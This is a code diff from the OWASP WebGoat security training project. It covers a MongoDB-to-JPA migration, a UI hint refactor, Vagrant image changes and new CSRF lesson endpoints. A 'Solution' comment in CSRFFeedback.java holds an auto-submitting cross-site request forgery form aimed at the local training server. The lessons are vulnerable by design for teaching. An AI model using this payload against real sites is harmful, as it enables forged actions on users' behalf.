 }

webgoat-container/src/main/java/org/owasp/webgoat/users/WebGoatUser.java

@@ -1,13 +1,14 @@
 package org.owasp.webgoat.users;
 
 import lombok.Getter;
-import org.springframework.data.annotation.Id;
-import org.springframework.data.annotation.Transient;
 import org.springframework.security.core.GrantedAuthority;
 import org.springframework.security.core.authority.SimpleGrantedAuthority;
 import org.springframework.security.core.userdetails.User;
 import org.springframework.security.core.userdetails.UserDetails;
 
+import javax.persistence.Entity;
+import javax.persistence.Id;
+import javax.persistence.Transient;
 import java.util.Collection;
 import java.util.Collections;
 
@@ -16,6 +17,7 @@ import java.util.Collections;
  * @since 3/19/17.
  */
 @Getter
+@Entity
 public class WebGoatUser implements UserDetails {
 
     public static final String ROLE_USER = "WEBGOAT_USER";

webgoat-container/src/main/resources/application.properties

@@ -3,6 +3,10 @@ server.error.path=/error.html
 server.session.timeout=600
 server.contextPath=/WebGoat
 server.port=8080
+server.address=127.0.0.1
+
+spring.datasource.url=jdbc:hsqldb:file:${webgoat.server.directory}/data/webgoat
+spring.jpa.hibernate.ddl-auto=update
 
 
 logging.level.org.springframework=WARN
@@ -17,8 +21,8 @@ spring.resources.cache-period=0
 spring.thymeleaf.cache=false
 
 webgoat.clean=false
-webgoat.server.directory=${user.home}/.webgoat/
-webgoat.user.directory=${user.home}/.webgoat/
+webgoat.server.directory=${user.home}/.webgoat-${webgoat.build.version}/
+webgoat.user.directory=${user.home}/.webgoat-${webgoat.build.version}/
 webgoat.build.version=@project.version@
 webgoat.build.number=@build.number@
 webgoat.email=webgoat@owasp.org
@@ -28,22 +32,15 @@ webgoat.feedback.address.html=<A HREF=mailto:webgoat@owasp.org>webgoat@owasp.org
 webgoat.database.driver=org.hsqldb.jdbcDriver
 webgoat.database.connection.string=jdbc:hsqldb:mem:{USER}
 webgoat.default.language=en
-webgoat.embedded.mongo=${WG_INTERNAL_MONGO:true}
 
-webwolf.port=8081
-webwolf.url=http://localhost:${webwolf.port}/WebWolf
-webworf.url.landingpage=http://localhost:${webwolf.port}/landing
-webworf.url.mail=http://localhost:${webwolf.port}/mail
+webwolf.host=${WEBWOLF_HOST:localhost}
+webwolf.port=${WEBWOLF_PORT:8081}
+webwolf.url=http://${webwolf.host}:${webwolf.port}/WebWolf
+webworf.url.landingpage=http://${webwolf.host}:${webwolf.port}/landing
+webwolf.url.mail=http://${webwolf.host}:${webwolf.port}/mail
 
 spring.jackson.serialization.indent_output=true
 spring.jackson.serialization.write-dates-as-timestamps=false
 
-spring.activemq.brokerUrl=tcp://${WG_MQ_HOST:localhost}:${WG_MQ_PORT:61616}
-
-spring.data.mongodb.host=${WG_MONGO_HOST:localhost}
-spring.data.mongodb.port=${WG_MONGO_PORT:27017}
-spring.data.mongodb.database=webgoat
-spring.mongodb.embedded.storage.databaseDir=${webgoat.user.directory}/mongodb/
-
 #For static file refresh ... and faster dev :D
 spring.devtools.restart.additional-paths=webgoat-container/src/main/resources/static/js,webgoat-container/src/main/resources/static/css

webgoat-container/src/main/resources/static/js/goatApp/controller/LessonController.js

@@ -74,7 +74,7 @@ define(['jquery',
 
             this.loadLesson = function(name,pageNum) {
                 if (this.name === name) {
-                    this.listenTo(this.lessonHintView, 'hints:showButton', this.onShowHintsButton);
+                    this.listenToOnce(this.lessonHintView, 'hints:showButton', this.onShowHintsButton);
                     this.listenTo(this.lessonHintView, 'hints:hideButton', this.onHideHintsButton);
                     this.lessonContentView.navToPage(pageNum);
                     this.lessonHintView.hideHints();
@@ -102,12 +102,13 @@ define(['jquery',
                     hasSource:this.lessonInfoModel.get('hasSource')
                 });
 
-                this.listenTo(this.helpControlsView,'hints:show',this.showHints);
+                this.listenTo(this.helpControlsView,'hints:show',this.showHintsView);
 
                 this.listenTo(this.helpControlsView,'lesson:restart',this.restartLesson);
                 this.listenTo(this.developerControlsView, 'dev:labels', this.restartLesson);
 
                 this.helpControlsView.render();
+                this.showHintsView();
                 this.titleView.render(this.lessonInfoModel.get('lessonTitle'));
             };
 
@@ -180,8 +181,13 @@ define(['jquery',
 //                }
 //            };
 
-            this.showHints = function() {
+            this.showHintsView = function() {
                 this.lessonHintView.render();
+                if (this.lessonHintView.getHintsCount > 0) {
+                    this.helpControlsView.showHintsButton();
+                } else {
+                    this.helpControlsView.hideHintsButton();
+                }
             };
 
             this.restartLesson = function() {

webgoat-container/src/main/resources/static/js/goatApp/view/HintView.js

@@ -126,6 +126,10 @@ function($,
 			} else {
 				this.$el.find('#show-prev-hint').css('visibility','visible');
 			}
+		},
+
+		getHintsCount: function () {
+		    return this.collection.length;
 		}
 
 	});

webgoat-container/src/main/resources/static/js/goatApp/view/LessonContentView.js

@@ -45,7 +45,6 @@ define(['jquery',
             this.$el.find('.attack-feedback').hide();
             this.$el.find('.attack-output').hide();
             this.makeFormsAjax();
-            //this.ajaxifyAttackHref();
             $(window).scrollTop(0); //work-around til we get the scroll down sorted out
             var startPageNum = this.model.get('pageNum');
             this.initPagination(startPageNum);
@@ -86,6 +85,8 @@ define(['jquery',
             var prepareDataFunctionName = $(curForm).attr('prepareData');
             var callbackFunctionName = $(curForm).attr('callback');
             var submitData = (typeof webgoat.customjs[prepareDataFunctionName] === 'function') ? webgoat.customjs[prepareDataFunctionName]() : $(curForm).serialize();
+            var successCallBackFunctionName = $(curForm).attr('successCallback');
+            var failureCallbackFunctionName = $(curForm).attr('failureCallback');
             var callbackFunction = (typeof webgoat.customjs[callbackFunctionName] === 'function') ? webgoat.customjs[callbackFunctionName] : function() {};
             // var submitData = this.$form.serialize();
             this.curForm = curForm;
@@ -104,19 +105,18 @@ define(['jquery',
                 //complete: function (data) {
                     //callbackFunction(data);
                 //}
-            }).then(self.onSuccessResponse.bind(self), self.onErrorResponse.bind(self));
+            }).then(function(data){
+                 self.onSuccessResponse(data, failureCallbackFunctionName, successCallBackFunctionName)}, self.onErrorResponse.bind(self));
             return false;
          },
 
-        onSuccessResponse: function(data) {
+        onSuccessResponse: function(data, failureCallbackFunctionName, successCallBackFunctionName) {
             this.renderFeedback(data.feedback);
             this.renderOutput(data.output || "");
 
-            var successCallBackFunctionName = this.$form.attr('successCallback');
-            var failureCallbackFunctionName = this.$form.attr('failureCallback');
             //var submitData = (typeof webgoat.customjs[prepareDataFunctionName] === 'function') ? webgoat.customjs[prepareDataFunctionName]() : $(curForm).serialize();
-            successCallbackFunction = (typeof webgoat.customjs[successCallBackFunctionName] === 'function') ? webgoat.customjs[successCallBackFunctionName] : function() {};
-            failureCallbackFunction = (typeof webgoat.customjs[failureCallbackFunctionName] === 'function') ? webgoat.customjs[failureCallbackFunctionName] : function() {};
+            var successCallbackFunction = (typeof webgoat.customjs[successCallBackFunctionName] === 'function') ? webgoat.customjs[successCallBackFunctionName] : function() {};
+            var failureCallbackFunction = (typeof webgoat.customjs[failureCallbackFunctionName] === 'function') ? webgoat.customjs[failureCallbackFunctionName] : function() {};
             //TODO: refactor back assignmentCompleted in Java
             if (data.lessonCompleted || data.assignmentCompleted) {
                 this.markAssignmentComplete();
@@ -146,14 +146,6 @@ define(['jquery',
             return false;
         },
 
-        ajaxifyAttackHref: function() {  // rewrite any links with hrefs point to relative attack URLs
-            var self = this;
-            // instruct in template to have links returned with the attack-link class
-            $('a.attack-link').submit(function(event){
-                $.get(this.action, "json").then(self.onSuccessResponse, self.onErrorResponse);
-             });
-        },
-
         renderFeedback: function(feedback) {
             this.$curFeedback.html(polyglot.t(feedback) || "");
             this.$curFeedback.show(400)

webgoat-container/src/test/java/org/owasp/webgoat/assignments/AssignmentEndpointTest.java

@@ -62,7 +62,7 @@ public class AssignmentEndpointTest {
 
     public void init(AssignmentEndpoint a) {
         messages.setBasenames("classpath:/i18n/messages", "classpath:/i18n/WebGoatLabels");
-        when(userTrackerRepository.findOne(anyString())).thenReturn(userTracker);
+        when(userTrackerRepository.findByUser(anyString())).thenReturn(userTracker);
         ReflectionTestUtils.setField(a, "userTrackerRepository", userTrackerRepository);
         ReflectionTestUtils.setField(a, "userSessionData", userSessionData);
         ReflectionTestUtils.setField(a, "webSession", webSession);

webgoat-container/src/test/java/org/owasp/webgoat/plugins/TestConfig.java

@@ -1,23 +0,0 @@
-package org.owasp.webgoat.plugins;
-
-import com.github.fakemongo.Fongo;
-import com.mongodb.MongoClient;
-import org.springframework.context.annotation.Configuration;
-import org.springframework.data.mongodb.config.AbstractMongoConfiguration;
-
-/**
- * Using Fongo for embedded in memory MongoDB testing
- */
-@Configuration
-public class TestConfig extends AbstractMongoConfiguration {
-
-    @Override
-    protected String getDatabaseName() {
-        return "test";
-    }
-
-    @Override
-    public MongoClient mongo() throws Exception {
-        return new Fongo(getDatabaseName()).getMongo();
-    }
-}

webgoat-container/src/test/java/org/owasp/webgoat/service/LessonMenuServiceTest.java

@@ -63,7 +63,7 @@ public class LessonMenuServiceTest {
         when(course.getLessons(any())).thenReturn(Lists.newArrayList(l1, l2));
         when(course.getCategories()).thenReturn(Lists.newArrayList(Category.ACCESS_CONTROL));
         when(userTracker.getLessonTracker(any(AbstractLesson.class))).thenReturn(lessonTracker);
-        when(userTrackerRepository.findOne(anyString())).thenReturn(userTracker);
+        when(userTrackerRepository.findByUser(anyString())).thenReturn(userTracker);
 
         mockMvc.perform(MockMvcRequestBuilders.get(URL_LESSONMENU_MVC))
                 .andExpect(status().isOk())
@@ -81,7 +81,7 @@ public class LessonMenuServiceTest {
         when(course.getLessons(any())).thenReturn(Lists.newArrayList(l1));
         when(course.getCategories()).thenReturn(Lists.newArrayList(Category.ACCESS_CONTROL));
         when(userTracker.getLessonTracker(any(AbstractLesson.class))).thenReturn(lessonTracker);
-        when(userTrackerRepository.findOne(anyString())).thenReturn(userTracker);
+        when(userTrackerRepository.findByUser(anyString())).thenReturn(userTracker);
 
 
         mockMvc.perform(MockMvcRequestBuilders.get(URL_LESSONMENU_MVC))

webgoat-container/src/test/java/org/owasp/webgoat/service/LessonProgressServiceTest.java

@@ -72,7 +72,7 @@ public class LessonProgressServiceTest {
     @Before
     public void setup() {
         Assignment assignment = new Assignment("test", "test");
-        when(userTrackerRepository.findOne(anyString())).thenReturn(userTracker);
+        when(userTrackerRepository.findByUser(anyString())).thenReturn(userTracker);
         when(userTracker.getLessonTracker(any(AbstractLesson.class))).thenReturn(lessonTracker);
         when(websession.getCurrentLesson()).thenReturn(lesson);
         when(lessonTracker.getLessonOverview()).thenReturn(Maps.newHashMap(assignment, true));

webgoat-container/src/test/java/org/owasp/webgoat/service/ReportCardServiceTest.java

@@ -53,7 +53,7 @@ public class ReportCardServiceTest {
         when(course.getTotalOfLessons()).thenReturn(1);
         when(course.getTotalOfAssignments()).thenReturn(10);
         when(course.getLessons()).thenReturn(Lists.newArrayList(lesson));
-        when(userTrackerRepository.findOne(anyString())).thenReturn(userTracker);
+        when(userTrackerRepository.findByUser(anyString())).thenReturn(userTracker);
         when(userTracker.getLessonTracker(any(AbstractLesson.class))).thenReturn(lessonTracker);
         mockMvc.perform(MockMvcRequestBuilders.get("/service/reportcard.mvc"))
                 .andExpect(status().isOk())

webgoat-container/src/test/java/org/owasp/webgoat/users/UserRepositoryTest.java

@@ -0,0 +1,29 @@
+package org.owasp.webgoat.users;
+
+import org.assertj.core.api.Assertions;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.boot.test.autoconfigure.orm.jpa.DataJpaTest;
+import org.springframework.test.context.junit4.SpringRunner;
+
+@DataJpaTest
+@RunWith(SpringRunner.class)
+public class UserRepositoryTest {
+
+    @Autowired
+    private UserRepository userRepository;
+
+    @Test
+    public void userShouldBeSaved() {
+        WebGoatUser user = new WebGoatUser("test", "password");
+        userRepository.saveAndFlush(user);
+
+        user = userRepository.findByUsername("test");
+
+        Assertions.assertThat(user.getUsername()).isEqualTo("test");
+        Assertions.assertThat(user.getPassword()).isEqualTo("password");
+    }
+
+
+}

webgoat-container/src/test/java/org/owasp/webgoat/users/UserTrackerRepositoryTest.java

@@ -0,0 +1,101 @@
+package org.owasp.webgoat.users;
+
+import org.assertj.core.api.Assertions;
+import org.assertj.core.util.Lists;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import org.owasp.webgoat.lessons.Assignment;
+import org.owasp.webgoat.lessons.Category;
+import org.owasp.webgoat.lessons.NewLesson;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.boot.test.autoconfigure.orm.jpa.DataJpaTest;
+import org.springframework.test.context.junit4.SpringRunner;
+
+import java.util.List;
+
+@DataJpaTest
+@RunWith(SpringRunner.class)
+public class UserTrackerRepositoryTest {
+
+    private class TestLesson extends NewLesson {
+
+        @Override
+        public Category getDefaultCategory() {
+            return Category.AJAX_SECURITY;
+        }
+
+        @Override
+        public List<String> getHints() {
+            return Lists.newArrayList();
+        }
+
+        @Override
+        public Integer getDefaultRanking() {
+            return 12;
+        }
+
+        @Override
+        public String getTitle() {
+            return "test";
+        }
+
+        @Override
+        public String getId() {
+            return "test";
+        }
+
+        @Override
+        public List<Assignment> getAssignments() {
+            Assignment assignment = new Assignment("test", "test", Lists.newArrayList());
+            return Lists.newArrayList(assignment);
+        }
+    }
+
+    @Autowired
+    private UserTrackerRepository userTrackerRepository;
+
+
+    @Test
+    public void saveUserTracker() {
+        UserTracker userTracker = new UserTracker("test");
+        LessonTracker lessonTracker = userTracker.getLessonTracker(new TestLesson());
+
+        userTrackerRepository.save(userTracker);
+
+        userTracker = userTrackerRepository.findByUser("test");
+        Assertions.assertThat(userTracker.getLessonTracker("test")).isNotNull();
+    }
+
+    @Test
+    public void solvedAssignmentsShouldBeSaved() {
+        UserTracker userTracker = new UserTracker("test");
+        TestLesson lesson = new TestLesson();
+        userTracker.getLessonTracker(lesson);
+        userTracker.assignmentFailed(lesson);
+        userTracker.assignmentFailed(lesson);
+        userTracker.assignmentSolved(lesson, "test");
+
+        userTrackerRepository.saveAndFlush(userTracker);
+
+        userTracker = userTrackerRepository.findByUser("test");
+        Assertions.assertThat(userTracker.numberOfAssignmentsSolved()).isEqualTo(1);
+    }
+
+    @Test
+    public void saveAndLoadShouldHaveCorrectNumberOfAttemtps() {
+        UserTracker userTracker = new UserTracker("test");
+        TestLesson lesson = new TestLesson();
+        userTracker.getLessonTracker(lesson);
+        userTracker.assignmentFailed(lesson);
+        userTracker.assignmentFailed(lesson);
+        userTrackerRepository.saveAndFlush(userTracker);
+
+        userTracker = userTrackerRepository.findByUser("test");
+        userTracker.assignmentFailed(lesson);
+        userTracker.assignmentFailed(lesson);
+        userTrackerRepository.saveAndFlush(userTracker);
+
+        Assertions.assertThat(userTracker.getLessonTracker(lesson).getNumberOfAttempts()).isEqualTo(4);
+    }
+
+}

webgoat-container/src/test/resources/application-test.properties

@@ -1 +1,4 @@
 webgoat.user.directory=${java.io.tmpdir}
+
+spring.datasource.url=jdbc:hsqldb:mem:test
+spring.jpa.hibernate.ddl-auto=create-drop

webgoat-images/vagrant-developers/Vagrantfile

@@ -1,32 +0,0 @@
-Vagrant.configure(2) do |config|
-  config.vm.box = "boxcutter/ubuntu1604-desktop"
-
-
-  config.vm.provider "virtualbox" do |vb|
-  	vb.gui = true
-  	vb.memory = "4096"
-  	vb.cpus = 2
-  	vb.name = "WebGoat-Development"
-	vb.customize ["modifyvm", :id, "--nictype1", "virtio"]
-  end
-
-  config.ssh.shell = "bash -c 'BASH_ENV=/etc/profile exec bash'"
-
-  config.vm.provision 'shell' do |s|
-    s.path = '../vagrant_provision.sh'
-    s.privileged = true
-  end
-
-  config.vm.provision :shell, privileged:false, inline: <<-SHELL
-    echo -e "Cloning the WebGoat container repository"
-    git clone -b master https://github.com/WebGoat/WebGoat.git
-    echo -e "Cloning the WebGoat Lessons repository"
-    git clone -b master https://github.com/WebGoat/WebGoat-Lessons.git
-    SHELL
-
-  config.vm.provision 'shell' do |s|
-    s.inline = "echo Finished provisioning, login with user vagrant pass vagrant"
-  end
-
-end
-

webgoat-images/vagrant-training/Vagrantfile

@@ -0,0 +1,35 @@
+# Setup a Linux box headless which will start WebGoat and WebWolf helpful image to give away during training
+
+Vagrant.configure(2) do |config|
+  config.vm.box = "ubuntu/trusty64"
+  config.vm.network :forwarded_port, guest: 8080, host: 8080
+  config.vm.network :forwarded_port, guest: 8081, host: 8081
+  config.vm.provider "virtualbox" do |vb|
+  	vb.gui = false
+  	vb.memory = "4096"
+  	vb.cpus = 2
+  	vb.name = "WebGoat-Training"
+	vb.customize ["modifyvm", :id, "--nictype1", "virtio"]
+  end
+  config.vm.provider "vmware_fusion" do |vf|
+    vf.gui = false
+    vf.vmx["memsize"] = 4096
+    vf.vmx["numvcpus"] = 2
+    vf.vmx["displayname"] = "WebGoat-Training"
+  end
+
+  config.vm.provision "shell", inline: <<-SHELL
+    wget https://github.com/WebGoat/WebGoat/releases/download/v8.0.0.RELEASE/webgoat-server-8.0.0.RELEASE.jar
+    wget https://github.com/WebGoat/WebGoat/releases/download/v8.0.0.RELEASE/webwolf-8.0.0.RELEASE.jar
+    sudo add-apt-repository ppa:openjdk-r/ppa
+    sudo apt-get update
+    sudo apt-get install openjdk-8-jre -y
+    SHELL
+
+  config.vm.provision "shell", run: "always", privileged: false, inline: <<-SHELL
+    java -jar webgoat-server-8.0.0.RELEASE.jar &
+    sleep 40s
+    java -jar webwolf-8.0.0.RELEASE.jar
+    SHELL
+
+end

webgoat-images/vagrant-users/Vagrantfile

@@ -1,48 +0,0 @@
-#For now use the same as for developers but start WebGoat
-#In the future we can add Docker as well and then Vagrant can start the
-#Docker container or Chef which setups the Tomcat
-
-Vagrant.configure(2) do |config|
-  config.vm.box = "boxcutter/ubuntu1604-desktop"
-  config.vm.network :forwarded_port, guest: 8080, host: 9999
-  config.vm.provider "virtualbox" do |vb|
-  	vb.gui = false
-  	vb.memory = "2048"
-  	vb.cpus = 2
-  	vb.name = "WebGoat-Users"
-	vb.customize ["modifyvm", :id, "--nictype1", "virtio"]
-  end
-  config.vm.provider "vmware_fusion" do |vf|
-    vf.gui = false
-    vf.vmx["memsize"] = 4096
-    vf.vmx["numvcpus"] = 2
-    vf.vmx["displayname"] = "WebGoat-Users"
-  end
-
-  config.ssh.shell = "bash -c 'BASH_ENV=/etc/profile exec bash'"
-
-  config.vm.provision 'shell' do |s|
-    s.path = '../vagrant_provision.sh'
-    s.privileged = true
-  end
-
-  config.vm.provision :shell, inline: <<-SHELL
-    echo -e "Cloning the WebGoat container repository"
-    git clone -b master https://github.com/WebGoat/WebGoat.git
-    echo -e "Cloning the WebGoat Lessons repository"
-    git clone -b master https://github.com/WebGoat/WebGoat-Lessons.git
-    echo -e "Compiling and installing the WebGoat Container lesson server....."
-    mvn -q -DskipTests -file WebGoat/pom.xml clean compile install
-    echo -e "Compiling and installing the WebGoat Lessons $COL_RESET"
-    mvn -q -DskipTests -file WebGoat-Lessons/pom.xml package
-    echo -e "Copying the compiled lessons jars into the container so we can start the lesson server with some base lessons"
-    cp -fa ./WebGoat-Lessons/target/plugins/*.jar ./WebGoat/webgoat-container/src/main/webapp/plugin_lessons/
-    nohup mvn -q -DskipTests -file WebGoat/pom.xml -pl webgoat-container tomcat7:run-war 0<&- &>/dev/null &
-    SHELL
-
-  config.vm.provision 'shell' do |s|
-    s.inline = "echo Finished provisioning, open a browser and browse to http://localhost:9999/WebGoat/"
-  end
-
-end
-

webgoat-images/vagrant_provision.sh

@@ -1,62 +0,0 @@
-#!/usr/bin/env bash
-set -e
-
-echo "Setting locale..."
-sudo update-locale LC_ALL=en_US.UTF-8 LANG=en_US.UTF-8
-
-sudo kill -9 $(lsof -t /var/lib/dpkg/lock) || true
-sudo apt-get update
-sudo apt-get install -y git
-
-echo "Installing required packages..."
-sudo apt-get install -y -q build-essential autotools-dev automake pkg-config expect
-
-
-## Chrome
-wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | sudo apt-key add -
-sudo sh -c 'echo "deb http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list'
-sudo apt-get update
-sudo apt-get install -y google-chrome-stable
-
-## Java 8
-echo "Provisioning Java 8..."
-mkdir -p /home/vagrant/java
-cd /home/vagrant/java
-test -f /tmp/jdk-8-linux-x64.tar.gz || curl -q -L --cookie "oraclelicense=accept-securebackup-cookie" http://download.oracle.com/otn-pub/java/jdk/8u101-b13/jdk-8u101-linux-x64.tar.gz -o /tmp/jdk-8-linux-x64.tar.gz
-
-sudo mkdir -p /usr/lib/jvm
-sudo tar zxf /tmp/jdk-8-linux-x64.tar.gz -C /usr/lib/jvm
-
-sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_101/bin/java" 1
-sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_101/bin/javac" 1
-sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_101/bin/javaws" 1
-
-sudo chmod a+x /usr/bin/java
-sudo chmod a+x /usr/bin/javac
-sudo chmod a+x /usr/bin/javaws
-sudo chown -R root:root /usr/lib/jvm/jdk1.8.0_101
-
-echo "export JAVA_HOME=/usr/lib/jvm/jdk1.8.0_101" >> /home/vagrant/.bashrc
-
-## Maven
-echo "Installing Maven.."
-sudo apt-get install -y maven
-
-## ZAP
-echo "Provisioning ZAP..."
-cd /home/vagrant
-mkdir tools
-cd tools
-wget https://github.com/zaproxy/zaproxy/releases/download/2.5.0/ZAP_2.5.0_Linux.tar.gz
-tar xvfx ZAP_2.5.0_Linux.tar.gz
-rm -rf ZAP_2.5.0_Linux.tar.gz
-
-## IntelliJ
-cd /home/vagrant/tools
-wget https://download.jetbrains.com/idea/ideaIC-2016.1.4.tar.gz
-tar xvfz ideaIC-2016.1.4.tar.gz
-rm -rf ideaIC-2016.1.4.tar.gz
-
-## Eclipse
-sudo apt-get -y install eclipse
-

webgoat-lessons/auth-bypass/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.0.0.M2</version>
+        <version>8.0.0.M3</version>
     </parent>
 
 </project>

webgoat-lessons/bypass-restrictions/pom.xml

@@ -6,6 +6,6 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.0.0.M2</version>
+        <version>8.0.0.M3</version>
     </parent>
 </project>

webgoat-lessons/challenge/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.0.0.M2</version>
+        <version>8.0.0.M3</version>
     </parent>
 
 

webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/plugin/Flag.java

@@ -46,7 +46,6 @@ public class Flag extends Endpoint {
     @PostConstruct
     public void initFlags() {
         IntStream.range(1, 10).forEach(i -> FLAGS.put(i, UUID.randomUUID().toString()));
-        FLAGS.entrySet().stream().forEach(e -> log.debug("Flag {} {}", e.getKey(), e.getValue()));
     }
 
     @Override

webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/plugin/challenge7/Assignment7.java

@@ -45,7 +45,7 @@ public class Assignment7 extends AssignmentEndpoint {
 
     @Autowired
     private RestTemplate restTemplate;
-    @Value("${webworf.url.mail}")
+    @Value("${webwolf.url.mail}")
     private String webWolfMailURL;
 
     @GetMapping("/reset-password/{link}")

webgoat-lessons/client-side-filtering/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.0.0.M2</version>
+        <version>8.0.0.M3</version>
     </parent>
 
 </project>

webgoat-lessons/cross-site-scripting/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.0.0.M2</version>
+        <version>8.0.0.M3</version>
     </parent>
     <build>
        <plugins>

webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/CrossSiteScriptingLesson5a.java

@@ -64,7 +64,7 @@ public class CrossSiteScriptingLesson5a extends AssignmentEndpoint {
 		userSessionData.setValue("xss-reflected1-complete",(Object)"false");
 		StringBuffer cart = new StringBuffer();
 		cart.append("Thank you for shopping at WebGoat. <br />You're support is appreciated<hr />");
-		cart.append("<p>We have chaged credit card:" + field1 + "<br />");
+		cart.append("<p>We have charged credit card:" + field1 + "<br />");
 		cart.append(   "                             ------------------- <br />");
 		cart.append(   "                               $" + totalSale);
 

webgoat-lessons/csrf/pom.xml

@@ -6,6 +6,6 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.0.0.M2</version>
+        <version>8.0.0.M3</version>
     </parent>
 </project>

webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/plugin/CSRFFeedback.java

@@ -0,0 +1,88 @@
+package org.owasp.webgoat.plugin;
+
+import com.fasterxml.jackson.databind.ObjectMapper;
+import org.apache.commons.lang3.StringUtils;
+import org.apache.commons.lang3.exception.ExceptionUtils;
+import org.owasp.webgoat.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.assignments.AssignmentHints;
+import org.owasp.webgoat.assignments.AssignmentPath;
+import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.session.UserSessionData;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.http.MediaType;
+import org.springframework.web.bind.annotation.PostMapping;
+import org.springframework.web.bind.annotation.RequestBody;
+import org.springframework.web.bind.annotation.RequestParam;
+import org.springframework.web.bind.annotation.ResponseBody;
+
+import javax.servlet.http.Cookie;
+import javax.servlet.http.HttpServletRequest;
+import java.io.IOException;
+import java.util.Map;
+import java.util.UUID;
+
+/**
+ * @author nbaars
+ * @since 11/17/17.
+ */
+@AssignmentPath("/csrf/feedback")
+@AssignmentHints({"csrf-feedback-hint1", "csrf-feedback-hint2", "csrf-feedback-hint3"})
+public class CSRFFeedback extends AssignmentEndpoint {
+
+    @Autowired
+    private UserSessionData userSessionData;
+    @Autowired
+    private ObjectMapper objectMapper;
+
+    @PostMapping(value = "/message", produces = {"application/json"})
+    @ResponseBody
+    public AttackResult completed(HttpServletRequest request, @RequestBody String feedback) {
+        try {
+            objectMapper.readValue(feedback.getBytes(), Map.class);
+        } catch (IOException e) {
+           return failed().feedback(ExceptionUtils.getStackTrace(e)).build();
+        }
+        boolean correctCSRF = requestContainsWebGoatCookie(request.getCookies()) && request.getContentType().equals(MediaType.TEXT_PLAIN_VALUE);
+        correctCSRF &= hostOrRefererDifferentHost(request);
+        if (correctCSRF) {
+            String flag = UUID.randomUUID().toString();
+            userSessionData.setValue("csrf-feedback", flag);
+            return success().feedback("csrf-feedback-success").feedbackArgs(flag).build();
+        }
+        return failed().build();
+    }
+
+    @PostMapping(produces = "application/json")
+    @ResponseBody
+    public AttackResult flag(@RequestParam("confirmFlagVal") String flag) {
+        if (flag.equals(userSessionData.getValue("csrf-feedback"))) {
+            return trackProgress(success().build());
+        } else {
+            return trackProgress(failed().build());
+        }
+    }
+
+    private boolean hostOrRefererDifferentHost(HttpServletRequest request) {
+        String referer = request.getHeader("referer");
+        String host = request.getHeader("host");
+        return !StringUtils.contains(referer, host);
+    }
+
+    private boolean requestContainsWebGoatCookie(Cookie[] cookies) {
+        if (cookies != null) {
+            for (Cookie c : cookies) {
+                if (c.getName().equals("JSESSIONID")) {
+                    return true;
+                }
+            }
+        }
+        return false;
+    }
+
+    /** Solution
+     <form name="attack" enctype="text/plain" action="http://localhost:8080/WebGoat/csrf/feedback/message" METHOD="POST">
+     <input type="hidden" name='{"name": "Test", "email": "test1233@dfssdf.de", "subject": "service", "message":"dsaffd"}'>
+     </form>
+     <script>document.attack.submit();</script>
+     */
+}

webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/plugin/CSRFLogin.java

@@ -0,0 +1,40 @@
+package org.owasp.webgoat.plugin;
+
+import org.owasp.webgoat.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.assignments.AssignmentHints;
+import org.owasp.webgoat.assignments.AssignmentPath;
+import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.users.UserTracker;
+import org.owasp.webgoat.users.UserTrackerRepository;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.web.bind.annotation.PostMapping;
+import org.springframework.web.bind.annotation.ResponseBody;
+
+/**
+ * @author nbaars
+ * @since 11/17/17.
+ */
+@AssignmentPath("/csrf/login")
+@AssignmentHints({"csrf-login-hint1", "csrf-login-hint2", "csrf-login-hint3"})
+public class CSRFLogin extends AssignmentEndpoint {
+
+    @Autowired
+    private UserTrackerRepository userTrackerRepository;
+
+    @PostMapping(produces = {"application/json"})
+    @ResponseBody
+    public AttackResult completed() {
+        String userName = getWebSession().getUserName();
+        if (userName.startsWith("csrf")) {
+            markAssignmentSolvedWithRealUser(userName.substring("csrf-".length()));
+            return trackProgress(success().feedback("csrf-login-success").build());
+        }
+        return trackProgress(failed().feedback("csrf-login-failed").feedbackArgs(userName).build());
+    }
+
+    private void markAssignmentSolvedWithRealUser(String username) {
+        UserTracker userTracker = userTrackerRepository.findByUser(username);
+        userTracker.assignmentSolved(getWebSession().getCurrentLesson(), this.getClass().getSimpleName());
+        userTrackerRepository.save(userTracker);
+    }
+}

webgoat-lessons/csrf/src/main/resources/html/CSRF.html

@@ -2,15 +2,15 @@
 
 <html xmlns:th="http://www.thymeleaf.org">
 
-    <div class="lesson-page-wrapper">
+<div class="lesson-page-wrapper">
     <div class="adoc-content" th:replace="doc:CSRF_intro.adoc"></div>
-    </div>
+</div>
 
-    <div class="lesson-page-wrapper">
